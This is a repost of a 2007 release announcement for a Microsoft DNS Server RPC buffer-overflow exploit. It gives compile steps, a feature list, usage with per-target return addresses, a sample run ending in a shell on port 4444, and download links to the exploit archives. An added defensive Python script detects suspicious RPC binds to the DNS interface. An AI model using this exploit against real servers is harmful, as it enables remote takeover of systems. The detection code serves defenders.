MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

Posted by admin, 2017-05-04 01:29:22

Guizai's note: v2
Some readers commented that they did not know how to compile this, so here is how to build it from the Makefile with VC:
Run cmd.exe
Change to the vc/bin directory
Run vcvars32.bat
Change to the directory containing the makefile
nmake /f makefile

Source: milw0rm

Exploit v2 features:
– Target remote port 445 (by default, but requires auth)
– Manual target for dynamic TCP port (without auth)
– Automatic search for the dynamic DNS RPC port
– Local and remote OS fingerprinting (auto target)
– Windows 2000 Server and Windows 2003 Server (Spanish) supported by default
– Fixed bug with Windows 2003 shellcode
– Universal local exploit for Win2k (automatic search for opcodes)
– Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
– Added targets for remote Win2k English and Italian (not tested, found with the Metasploit opcode database; please report your own)
– Microsoft RPC API used (who cares? :p)

D:/Programación/DNSTEST>dnstest
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) – Win2k3 server SP2 Universal – (default for win2k3)
1 (0x79467ef8) – Win2k server SP4 Spanish – (default for win2k )
2 (0x7c4fedbb) – Win2k server SP4 English
3 (0x7963edbb) – Win2k server SP4 Italian
4 (0x41414141) – Windows all Denial of Service

D:/Programación/DNSTEST>dnstest.exe -h 192.168.1.2
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
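The session above shows the order a client follows to reach the DNS server's RPC interface: an endpoint-mapper query for the interface UUID 50abc2a4-574d-40b3-9d66-ee4fd5fba076, the dynamic ncacn_ip_tcp port it returns, then a bind and the DnssrvOperation call. The Python below is added here as an example and is not part of the original exploit or its output. It parses RPC string bindings in the syntax shown in the log (`[uuid@]protseq:address[endpoint]`) and runs a defender-side check over constructed log lines: any bind to the DNS Server interface UUID from a host not on an admin allow-list is flagged, and binds over a dynamic TCP port (the path the feature list says needs no auth) are called out separately from named-pipe binds over port 445. The log format, the client addresses, the timestamps and the pipe name in the sample lines are all constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

# UUID of the Microsoft DNS Server management RPC interface, taken from the
# exploit output above ("[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0").
DNS_SERVER_RPC_UUID = "50abc2a4-574d-40b3-9d66-ee4fd5fba076"

# RPC string binding syntax: [uuid@]protseq:address[endpoint]
#   ncacn_ip_tcp:192.168.1.2[1105]      -> TCP, dynamic port 1105 (the exploit's port-less path)
#   ncacn_np:192.168.1.2[\pipe\name]    -> SMB named pipe, i.e. port 445 (the exploit's default path)
BINDING_RE = re.compile(
    r"^(?:(?P<uuid>[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})@)?"
    r"(?P<protseq>ncacn_ip_tcp|ncacn_np|ncalrpc|ncacn_http)"
    r":(?P<address>[^\[\]]*)"
    r"(?:\[(?P<endpoint>[^\]]+)\])?$"
)


@dataclass(frozen=True)
class StringBinding:
    uuid: Optional[str]
    protseq: str
    address: str
    endpoint: Optional[str]


def parse_string_binding(text: str) -> StringBinding:
    """Parse an RPC string binding; raise ValueError on malformed input."""
    m = BINDING_RE.match(text.strip())
    if m is None:
        raise ValueError(f"not an RPC string binding: {text!r}")
    uuid = m.group("uuid")
    return StringBinding(
        uuid=uuid.lower() if uuid else None,
        protseq=m.group("protseq"),
        address=m.group("address"),
        endpoint=m.group("endpoint"),
    )


# Hypothetical, constructed log format (not a real Windows event format):
#   <timestamp> src=<client ip> bind=<rpc string binding>
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+bind=(?P<bind>\S+)$")


@dataclass(frozen=True)
class Alert:
    ts: str
    src: str
    binding: StringBinding
    reason: str


def find_dns_rpc_binds(lines: Iterable[str], allowed_admin_hosts: Set[str]) -> List[Alert]:
    """Flag binds to the DNS Server RPC interface from hosts that are not expected admins.

    Binds over ncacn_ip_tcp (dynamic port, no auth required per the feature list) get a
    distinct reason from binds over ncacn_np (SMB named pipe over port 445, auth required).
    """
    alerts: List[Alert] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m is None:
            continue  # unrelated or malformed line: skip rather than crash the sweep
        try:
            binding = parse_string_binding(m.group("bind"))
        except ValueError:
            continue
        if binding.uuid != DNS_SERVER_RPC_UUID:
            continue  # some other RPC interface
        if m.group("src") in allowed_admin_hosts:
            continue  # expected management host
        if binding.protseq == "ncacn_ip_tcp":
            reason = "dns rpc over dynamic tcp port (unauthenticated path)"
        else:
            reason = f"dns rpc over {binding.protseq}"
        alerts.append(Alert(m.group("ts"), m.group("src"), binding, reason))
    return alerts


def count_by_source(alerts: Iterable[Alert]) -> Dict[str, int]:
    """Count flagged binds per client address, for triage ordering."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a.src] = counts.get(a.src, 0) + 1
    return counts


# Constructed sample log lines: addresses, timestamps, the second UUID and the pipe
# name are made up for the example. Line 3 is a different interface, line 4 carries
# no UUID at all, line 5 is noise; none of those should be flagged.
SAMPLE_LOG = r"""
2007-04-18T10:00:01Z src=10.0.0.5 bind=50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
2007-04-18T10:00:02Z src=10.0.0.9 bind=50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.2[\pipe\dnsserver]
2007-04-18T10:00:03Z src=10.0.0.5 bind=00000000-0000-0000-0000-000000000001@ncacn_ip_tcp:192.168.1.2[135]
2007-04-18T10:00:04Z src=10.0.0.5 bind=ncacn_ip_tcp:192.168.1.2[1105]
this line is deliberately not in the expected format
""".strip().splitlines()


if __name__ == "__main__":
    for alert in find_dns_rpc_binds(SAMPLE_LOG, allowed_admin_hosts={"10.0.0.9"}):
        print(alert.ts, alert.src, alert.binding.protseq, alert.binding.endpoint, alert.reason)
```

With `10.0.0.9` on the allow-list only the TCP bind from `10.0.0.5` to port 1105 is reported; with an empty allow-list the named-pipe bind from `10.0.0.9` is reported too, with a reason that distinguishes the two transports. Whatever log source a real deployment has, the useful signal is the same one the exploit output exposes: endpoint-mapper resolution of the DNS interface UUID followed by a bind to the returned dynamic port from a host that has no business administering DNS.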

Also available at:

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip

# milw0rm.com [2007-04-18]

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided for security research and teaching only; readers who use this information for any other purpose bear full legal and joint liability, and this site assumes none. If there is a problem, please contact us by e-mail (use a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Posted by admin on 2017-05-04 01:29:22. Please keep the original link when reposting (CN-SEC中文网, with thanks to the original author): https://cn-sec.com/archives/49680.html